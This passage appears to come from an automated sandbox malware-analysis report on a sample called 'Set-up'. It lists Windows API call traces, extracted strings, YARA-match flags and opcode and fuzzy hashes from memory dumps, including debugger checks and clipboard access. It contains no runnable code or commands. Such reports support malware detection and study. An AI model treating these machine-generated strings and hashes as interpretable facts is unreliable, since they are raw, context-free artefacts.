                                                                                                                                  • SwitchToThread.KERNEL32(?,?,?,01163D80,000000FF,?,00E46444,460C02D8), ref: 00E459C8
                                                                                                                                  • InterlockedExchange.KERNEL32(0131ADF8,00000001), ref: 00E459D5
                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(0131ADF4,00000000), ref: 00E459ED
                                                                                                                                  • CryptAcquireContextA.ADVAPI32(0131ADF0,00000000,00000000,00000001,F0000000), ref: 00E45A05
                                                                                                                                  • InterlockedIncrement.KERNEL32(0131ADF4), ref: 00E45A14
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E45A1C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$Exchange$AcquireContextCryptErrorIncrementLastSwitchThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2311981888-0
                                                                                                                                  • Opcode ID: 2da2f652c945f70f87fcdae06099d44b573f76456e26e2377b91c26743afaae0
                                                                                                                                  • Instruction ID: 7c296216fd7df3daf1f0e7fd8a2616cc0aaff30e7f80ebf05342e8496408f5ed
                                                                                                                                  • Opcode Fuzzy Hash: 2da2f652c945f70f87fcdae06099d44b573f76456e26e2377b91c26743afaae0
                                                                                                                                  • Instruction Fuzzy Hash: EB113432385745AFDB389FA5EC96BAA7BB8EB00B15F00026DF521E3285D7706484C725
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -$.$A$gfff$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-3814466830
                                                                                                                                  • Opcode ID: f4961ff8a02584759a9619b723c8481bf4e97fcdf5aa60f21e551e1eb24d1177
                                                                                                                                  • Instruction ID: d21c2d5a45f0c32ee5f7ecf74979be279ac5114c649ebbe1b6e9591ffa5df0ae
                                                                                                                                  • Opcode Fuzzy Hash: f4961ff8a02584759a9619b723c8481bf4e97fcdf5aa60f21e551e1eb24d1177
                                                                                                                                  • Instruction Fuzzy Hash: 46F1B27160D7858FC718CE29C4906EBBBE2BFC9300F088A6EE99987391D775D905DB42
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1647500905-0
                                                                                                                                  • Opcode ID: fcff533c875ad6d8bde2d63c3cef850d051e4cf56d106a6a54a4867c64365ddf
                                                                                                                                  • Instruction ID: 4b144311540e555cb8a956d82c5b075f2c76cead3343e07b64f41b446a3dd867
                                                                                                                                  • Opcode Fuzzy Hash: fcff533c875ad6d8bde2d63c3cef850d051e4cf56d106a6a54a4867c64365ddf
                                                                                                                                  • Instruction Fuzzy Hash: 135126B2A08755DFD700EBBCD84939EBFE1AB55200F048538D998DB382E378D914CB96
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: <0<>$cf0?$f|nf$zhcz$~5g$QW$U7[
                                                                                                                                  • API String ID: 0-3684071681
                                                                                                                                  • Opcode ID: ab9868a001b5592597039ded65ae479b8ce40629b2d5a65dad021cd865f52924
                                                                                                                                  • Instruction ID: f730b9606b8f75d51726a286f40d55d5f2ca58e5a9d05f6402a8a6b9edbb6b8a
                                                                                                                                  • Opcode Fuzzy Hash: ab9868a001b5592597039ded65ae479b8ce40629b2d5a65dad021cd865f52924
                                                                                                                                  • Instruction Fuzzy Hash: BCC1157160C3859BD314CF29C49136FBBE2AFD2248F18886CE9D69B345D775C94ACB82
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -$.$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-1174649707
                                                                                                                                  • Opcode ID: c362ef20c276e6fcd28eaf5be008f6dd9a57829d617c97d9d97c4c13b772dc45
                                                                                                                                  • Instruction ID: 5c51938b3c7ee3943d1de590ed6595e54822aa6e8243079108b2903b165d6743
                                                                                                                                  • Opcode Fuzzy Hash: c362ef20c276e6fcd28eaf5be008f6dd9a57829d617c97d9d97c4c13b772dc45
                                                                                                                                  • Instruction Fuzzy Hash: 6DD1AF7560D3818FC719CE29C48066AFBF2ABDA304F088A6DE8DAC7356D674D905CB52
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: +$.$A$gfff$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-2290567592
                                                                                                                                  • Opcode ID: 8e77ca7388db3fda6d77f0150d27ee7a11390d7dc3264986fe778acfb6154491
                                                                                                                                  • Instruction ID: c463ce54b10d9f013af2188451af9eaa5cd4ababd8c5c407bcafcdbbdba13471
                                                                                                                                  • Opcode Fuzzy Hash: 8e77ca7388db3fda6d77f0150d27ee7a11390d7dc3264986fe778acfb6154491
                                                                                                                                  • Instruction Fuzzy Hash: E2C1C275A0C7418FC318CE2DC89066ABBE6BBCA304F088A3DE99AD7355D675DD05CB42
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: +$.$A$gfff$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-2290567592
                                                                                                                                  • Opcode ID: 8e77ca7388db3fda6d77f0150d27ee7a11390d7dc3264986fe778acfb6154491
                                                                                                                                  • Instruction ID: 317f3dfdc776b33325700ab74fb873c77316389f5216c1bc0a1cd8c65eb96223
                                                                                                                                  • Opcode Fuzzy Hash: 8e77ca7388db3fda6d77f0150d27ee7a11390d7dc3264986fe778acfb6154491
                                                                                                                                  • Instruction Fuzzy Hash: D1C1D071A0D7458FC718CE2DC4906EBBBE2BBC9300F088A7EE99987385D775D9058B42
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(0131ADF8,00000001), ref: 00E45B77
                                                                                                                                  • SwitchToThread.KERNEL32(?,?), ref: 00E45B81
                                                                                                                                  • InterlockedExchange.KERNEL32(0131ADF8,00000001), ref: 00E45B8E
                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(0131ADF4,00000000), ref: 00E45BA6
                                                                                                                                  • InterlockedDecrement.KERNEL32(0131ADF4), ref: 00E45BB5
                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,?,?), ref: 00E45BC6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$Exchange$ContextCryptDecrementReleaseSwitchThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 229502837-0
                                                                                                                                  • Opcode ID: 6725874bf5aac55bd1d27d95895613f442e89f73b58074b28bd58cf7d33b021a
                                                                                                                                  • Instruction ID: 6b7602eef6874d6514f215c02c6ac9de70f82c203412fa638848c389fe24a974
                                                                                                                                  • Opcode Fuzzy Hash: 6725874bf5aac55bd1d27d95895613f442e89f73b58074b28bd58cf7d33b021a
                                                                                                                                  • Instruction Fuzzy Hash: 3211E172340705ABD7399F65EC96B5A7BA8FB00B16F000128F421E2284D77064808B20
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $INO$0$8<.~$T<.~$re^)$s}~z$ze^)
                                                                                                                                  • API String ID: 0-2811005808
                                                                                                                                  • Opcode ID: 97e3f046d742d5f3d83fcbb33a268169f4d2770ce0df8231e917b6585121f374
                                                                                                                                  • Instruction ID: 40eb5333dd49be6b7c92ce0a945d42a62906e465ed94297f97ae63569a8f59f3
                                                                                                                                  • Opcode Fuzzy Hash: 97e3f046d742d5f3d83fcbb33a268169f4d2770ce0df8231e917b6585121f374
                                                                                                                                  • Instruction Fuzzy Hash: 72918AB5A093149BD714CF14C891B2BBBF6FBC9310F18882DE89687390C735E945CB96
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(460C02D8,?,-000000D0,-000000D0), ref: 00E4C82A
                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000800,00000000,00000000,00000000), ref: 00E4C913
                                                                                                                                  • SetLastError.KERNEL32(460C02D8), ref: 00E4CA17
                                                                                                                                  Strings
                                                                                                                                  • !af_ && i<length(), xrefs: 00E4C9F2
                                                                                                                                  • basic_ncstring<wchar_t>::operator [], xrefs: 00E4C9ED
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FormatMessage
                                                                                                                                  • String ID: !af_ && i<length()$basic_ncstring<wchar_t>::operator []
                                                                                                                                  • API String ID: 71157656-589021327
                                                                                                                                  • Opcode ID: e857b9f68fbe261d8eab9a596fd63a2b8317a711d0ae3202e0731cd4b6454b87
                                                                                                                                  • Instruction ID: ce0c94eae9cf64913bfd67b985dc1fefdc76f09c7a6475b7cf16640b6f495b64
                                                                                                                                  • Opcode Fuzzy Hash: e857b9f68fbe261d8eab9a596fd63a2b8317a711d0ae3202e0731cd4b6454b87
                                                                                                                                  • Instruction Fuzzy Hash: EE513871A42209ABDB68DB64EC457BEB7A4EF88314F349119E912F72C0DB70AC44C795
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,-$47$C$\$m%g+$/)
                                                                                                                                  • API String ID: 0-582880345
                                                                                                                                  • Opcode ID: 57d1e575db662d58e0bd7c5c6dd9e2b79646e402ce1b0d3550dcfe6c3158a993
                                                                                                                                  • Instruction ID: 887e12eb09555ae020b4ec2920f4f2a005747c70f1cfcd031623b63777fb6966
                                                                                                                                  • Opcode Fuzzy Hash: 57d1e575db662d58e0bd7c5c6dd9e2b79646e402ce1b0d3550dcfe6c3158a993
                                                                                                                                  • Instruction Fuzzy Hash: D82231726083019BE718CF24CC85BABBBA6EFD5314F148A2DF5959B3D0D774A905CB82
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: +$A$gfff$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-3068076857
                                                                                                                                  • Opcode ID: a0f6d55a8ad55c259c2e824b8ed20efe1f4757d572f9fb092c2dccb43a1146ce
                                                                                                                                  • Instruction ID: c17021bbceef7c74c5831f5b2443e522a2158942a9297669807e3f6e16bd7ca6
                                                                                                                                  • Opcode Fuzzy Hash: a0f6d55a8ad55c259c2e824b8ed20efe1f4757d572f9fb092c2dccb43a1146ce
                                                                                                                                  • Instruction Fuzzy Hash: 03B1E2766097418FC318CE2DC89066AFBE6BBCA314F08CA6DE896D7351D674DD05CB82
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(0131ADF4,00000000), ref: 00E45C32
                                                                                                                                  • CryptGenRandom.ADVAPI32 ref: 00E45C71
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E45C7B
                                                                                                                                  Strings
                                                                                                                                  • NoCrtRandom::GenRandom: CryptGenRandom() failed: , xrefs: 00E45C93
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptErrorExchangeInterlockedLastRandom
                                                                                                                                  • String ID: NoCrtRandom::GenRandom: CryptGenRandom() failed:
                                                                                                                                  • API String ID: 3255506635-416679881
                                                                                                                                  • Opcode ID: 43dfd6802025b9d24f6f77bd6ebc4998e860a06459ca46681867d63ca5fc8ee6
                                                                                                                                  • Instruction ID: 5cee5b1afce37f639e72bc2535c7f59b9bb5f8b2c3715358c866fd94dbd94ed0
                                                                                                                                  • Opcode Fuzzy Hash: 43dfd6802025b9d24f6f77bd6ebc4998e860a06459ca46681867d63ca5fc8ee6
                                                                                                                                  • Instruction Fuzzy Hash: CB210732A04248EFCB18DF64E846BDEBFF8EB95720F00416EF405A7291EB712944C791
                                                                                                                                  APIs
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E5A832
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00000001,?,00000000), ref: 00E5A844
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A86F
                                                                                                                                  Strings
                                                                                                                                  • SetSecurityDescriptorDacl(), xrefs: 00E5A852
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DaclDescriptorErrorException@8LastSecurityThrow
                                                                                                                                  • String ID: SetSecurityDescriptorDacl()
                                                                                                                                  • API String ID: 1851696875-1824548980
                                                                                                                                  • Opcode ID: 10f6c1e3e2e51b69eff794aaf272da789d4cb6f5105516f25e92bf38a9b47f70
                                                                                                                                  • Instruction ID: 02a74ac0e57aa4739125e97fbd9cb6ede333ba0f5cb015594d513490babd1c39
                                                                                                                                  • Opcode Fuzzy Hash: 10f6c1e3e2e51b69eff794aaf272da789d4cb6f5105516f25e92bf38a9b47f70
                                                                                                                                  • Instruction Fuzzy Hash: BEE02B3165430877CA28BA749D4BF0A3BAC6B00B15F000928FB10650C0EAB16418C36B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 7EqG$@A$H=J?$U9F;$k7Q)
                                                                                                                                  • API String ID: 0-1467649568
                                                                                                                                  • Opcode ID: e0e68ea7dc3ab3379a842cc3e1dd6a5ef2a16c84e37a91afed43c3ff3cc704b2
                                                                                                                                  • Instruction ID: be92dc8546bd37f6cd71a29a9b589a02559b63ee330f5eddc531a616f324d5a7
                                                                                                                                  • Opcode Fuzzy Hash: e0e68ea7dc3ab3379a842cc3e1dd6a5ef2a16c84e37a91afed43c3ff3cc704b2
                                                                                                                                  • Instruction Fuzzy Hash: 74D113B15183418BD724DF24C8527ABB7F2FF96314F09991CE9858F394EB798805CB92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 7EqG$@A$H=J?$U9F;$k7Q)
                                                                                                                                  • API String ID: 0-1467649568
                                                                                                                                  • Opcode ID: 78d8d2e57be9f807328f3e5898bf8797b49680cd34cc95d7087d64c49ba11923
                                                                                                                                  • Instruction ID: a16f1dcac738dd24e8a50b52971ca021188245fd89d55faaa0bb63d40e10ebcd
                                                                                                                                  • Opcode Fuzzy Hash: 78d8d2e57be9f807328f3e5898bf8797b49680cd34cc95d7087d64c49ba11923
                                                                                                                                  • Instruction Fuzzy Hash: 97D1F3B15183428BDB28CF25C8527AB7BF2FF92314F09995DE8828F390E7799505CB52
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: D$HI$L$xy$
                                                                                                                                  • API String ID: 0-3945132347
                                                                                                                                  • Opcode ID: 1089bc77347516779f8c07777a8bb5ceda5a6c3cbfd9a0ecd7a2efd9d36b0d43
                                                                                                                                  • Instruction ID: df83146d05db70d47b8a3db7f8ecddacea1709994a8d9ac87f620d979bd53b9f
                                                                                                                                  • Opcode Fuzzy Hash: 1089bc77347516779f8c07777a8bb5ceda5a6c3cbfd9a0ecd7a2efd9d36b0d43
                                                                                                                                  • Instruction Fuzzy Hash: 2AF107716187808BD714DF29C49576BBBF1FF86314F18892DE8E58B392D778C8098B52
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %*+($GhC<$GhC<$KhC<$KhC<
                                                                                                                                  • API String ID: 0-3640935975
                                                                                                                                  • Opcode ID: bc92ecf489f5140421f96915db100f9b59fe64921f5c7bfe3030677c98e4024b
                                                                                                                                  • Instruction ID: 2e21394959f394fe42ada0c30028e520e0b61240370b5a2692333cfd6372d0ab
                                                                                                                                  • Opcode Fuzzy Hash: bc92ecf489f5140421f96915db100f9b59fe64921f5c7bfe3030677c98e4024b
                                                                                                                                  • Instruction Fuzzy Hash: D1416B317092255BC72949198C91B7EBBEBFBC9720F284A2CFCA5172C4CA349D068755
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: "HDJ$>$F_$uw9
                                                                                                                                  • API String ID: 0-1920824788
                                                                                                                                  • Opcode ID: db89a92e8465f626fe880a803d2994e0672e615bd8c5af3f402e5e008234b867
                                                                                                                                  • Instruction ID: ff41dc73f0274d82dade6d9301b70884a7aecbab9009c4568018e52c8a5e1949
                                                                                                                                  • Opcode Fuzzy Hash: db89a92e8465f626fe880a803d2994e0672e615bd8c5af3f402e5e008234b867
                                                                                                                                  • Instruction Fuzzy Hash: 8781D57260D3958BD315CF29C8A177BBFE2AFD3204F18496DE8D6CB281D73989098752
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E39F10: InitializeCriticalSectionAndSpinCount.KERNEL32(01319A44,00000000,01119149,?,?,?,00E39DBA), ref: 00E39F13
                                                                                                                                    • Part of subcall function 00E39F10: GetLastError.KERNEL32(?,?,?,00E39DBA), ref: 00E39F1D
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00E39DBA), ref: 0111914D
                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E39DBA), ref: 0111915C
                                                                                                                                  Strings
                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 01119157
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                  • API String ID: 450123788-631824599
                                                                                                                                  • Opcode ID: a96cb1f60f2d71a8c2486ad0e4a027084d028c7a8ca4431075356f0defac6144
                                                                                                                                  • Instruction ID: 204a4d6128f9763082fb075910eb77a94d322468310fa5a9c64ebf76ccde663a
                                                                                                                                  • Opcode Fuzzy Hash: a96cb1f60f2d71a8c2486ad0e4a027084d028c7a8ca4431075356f0defac6144
                                                                                                                                  • Instruction Fuzzy Hash: 94E06D746013518FD3389F29D458383BAE8AB14758F008D6CE4A1D2345DBB0E488CFA1
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0131B928), ref: 0112306D
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0131B928), ref: 01123077
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0131B600,?,?,?,?,?,0131B928), ref: 01123084
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                  • Opcode ID: 5c14106eb7f1ced8de016d20f20d92257308f73e4ef8621d9289613b934dcdc6
                                                                                                                                  • Instruction ID: 2d4584f34ad28a077bdc415f046b10c271b5e6fb7f70f87267d1750a42823a3c
                                                                                                                                  • Opcode Fuzzy Hash: 5c14106eb7f1ced8de016d20f20d92257308f73e4ef8621d9289613b934dcdc6
                                                                                                                                  • Instruction Fuzzy Hash: 7F31D47491522D9BCB25DF28D8887CCBBB8BF08310F5042EAE51CA7250E7749B868F45
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,00F7A8A0,c_ >= s_,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8,?,?,0131DFD8,?,?,?,?), ref: 00E44BE6
                                                                                                                                  • DebugBreak.KERNEL32(?,00F7A8A0,c_ >= s_,datavect<struct QuantumRegistry::Entry *>::insert,00000184,0131DFDC,0131DFD8,?,?,0131DFD8,?,?,?,?), ref: 00E44BF0
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00E44C20
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BreakDebugDebuggerExitPresentProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2005660601-0
                                                                                                                                  • Opcode ID: 46101e4e3eaeb7ba0692cc49b2513c025c4353c9ffa6f0d08eb7381c1d6853a9
                                                                                                                                  • Instruction ID: 3262a7eac9069d87b9cfaaac968d20f274414a60b7d084829427de0c351003e4
                                                                                                                                  • Opcode Fuzzy Hash: 46101e4e3eaeb7ba0692cc49b2513c025c4353c9ffa6f0d08eb7381c1d6853a9
                                                                                                                                  • Instruction Fuzzy Hash: 93E04F726407046BDB207F70AC46B4A3654AF04B15F609220BA35AA2D6DEB0F5958B6A
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,01124C59,?,012FF4D8,0000000C,01124DB0,?,00000002,00000000,?,011231E2,00000003,0111AB4D,460C02D8), ref: 01124CA4
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,01124C59,?,012FF4D8,0000000C,01124DB0,?,00000002,00000000,?,011231E2,00000003,0111AB4D,460C02D8), ref: 01124CAB
                                                                                                                                  • ExitProcess.KERNEL32 ref: 01124CBD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: 7eac750d07b57c4fa5f3a3dd239bb6ea1c5d285be270a585b4a40e8b4dbbdc80
                                                                                                                                  • Instruction ID: 27f32dc6a2d2f2f0ccc4f8848e35c4dc6190673ee70053a0f7f489ec18726e3a
                                                                                                                                  • Opcode Fuzzy Hash: 7eac750d07b57c4fa5f3a3dd239bb6ea1c5d285be270a585b4a40e8b4dbbdc80
                                                                                                                                  • Instruction Fuzzy Hash: 6CE08C31000258AFCF2A6F28D94CA483FA9EF14381F008024FD148BA35CB35ECA2EB80
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: #-*$0$;4<9
                                                                                                                                  • API String ID: 0-465666365
                                                                                                                                  • Opcode ID: 9b94dc8781b5ce4e1831bd7a1123c21985bbcf93a6a9a06d5d41fc769b69dbab
                                                                                                                                  • Instruction ID: 153cbf56e040d76fce6c1a2902d359c911798052fcad37edd4c4175112507578
                                                                                                                                  • Opcode Fuzzy Hash: 9b94dc8781b5ce4e1831bd7a1123c21985bbcf93a6a9a06d5d41fc769b69dbab
                                                                                                                                  • Instruction Fuzzy Hash: BDC1F57150D3918BD721CF29985036BBBE2AFD3244F0889ADD8D5DB342D779C90AC792
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
